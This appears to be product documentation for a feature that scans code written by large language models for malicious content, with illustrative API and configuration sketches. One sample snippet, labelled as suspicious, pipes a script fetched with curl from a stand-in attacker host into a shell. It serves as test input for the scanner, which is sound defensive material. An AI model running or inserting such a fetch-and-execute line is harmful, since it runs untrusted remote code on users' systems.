Malicious Code Detection scans LLM-generated code snippets across multiple languages to prevent security threats and supply chain attacks.
Code snippets generated by Large Language Models (LLMs) can be scanned with the Malicious Code Detection feature to identify potential security threats. This feature is crucial for preventing supply chain attacks, enhancing application security, maintaining code integrity, and mitigating AI risks.
The system supports scanning for malicious code in multiple languages, including JavaScript, Python, VBScript, PowerShell, Batch, Shell, and Perl.
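As an illustration of how such a scan might be wired into a code-generation workflow, the Python sketch below submits an LLM-generated snippet for analysis before it is executed. The endpoint URL, authentication header, request field names, and response shape are assumptions chosen for illustration, not the product's documented API.

```python
# Illustrative sketch only: the endpoint, header, and field names below are
# assumptions, not the documented API of the scanning service.
import requests

# An LLM-generated snippet to check before it is executed or committed.
llm_generated_code = '''
import os
os.system("curl http://attacker.example/payload.sh | sh")  # suspicious pattern
'''

SCAN_ENDPOINT = "https://security-api.example.com/v1/scan/code"  # hypothetical URL

response = requests.post(
    SCAN_ENDPOINT,
    headers={"x-api-key": "YOUR_API_KEY"},   # hypothetical auth header
    json={
        "code_snippet": llm_generated_code,  # hypothetical field name
        "language": "python",                # one of the supported languages
    },
    timeout=10,
)

# The verdict shape shown here is also illustrative.
verdict = response.json()
print(verdict)  # e.g. {"malicious": true, "action": "block"}
```

In a workflow like this, the snippet would only be handed off to the build or runtime environment if the verdict reports it as clean.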
To activate this protection, enable it within the API Security Profile. When configured, the feature can be set to block potentially malicious code or to allow it, depending on your security needs. This capability is vital for organizations that increasingly leverage generative AI for development, as it helps secure against the risks of LLM poisoning, where adversaries intentionally introduce malicious data into training datasets to manipulate model outputs.
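A minimal sketch of what such a profile setting might look like is shown below. The profile structure, field names, and values are assumptions meant to illustrate the block/allow choice, not the product's actual configuration schema.

```python
# Illustrative sketch only: the profile structure and field names are
# assumptions meant to show the block/allow choice, not the actual schema.
import json

api_security_profile = {
    "profile_name": "llm-code-protection",  # hypothetical profile name
    "malicious_code_detection": {
        "enabled": True,
        # "block" prevents flagged code from being returned or executed;
        # "allow" permits it, e.g. for monitoring-only deployments.
        "action": "block",
        "languages": [
            "javascript", "python", "vbscript",
            "powershell", "batch", "shell", "perl",
        ],
    },
}

print(json.dumps(api_security_profile, indent=2))
```

Choosing "block" enforces the detection inline, while "allow" lets teams evaluate detections before turning on enforcement.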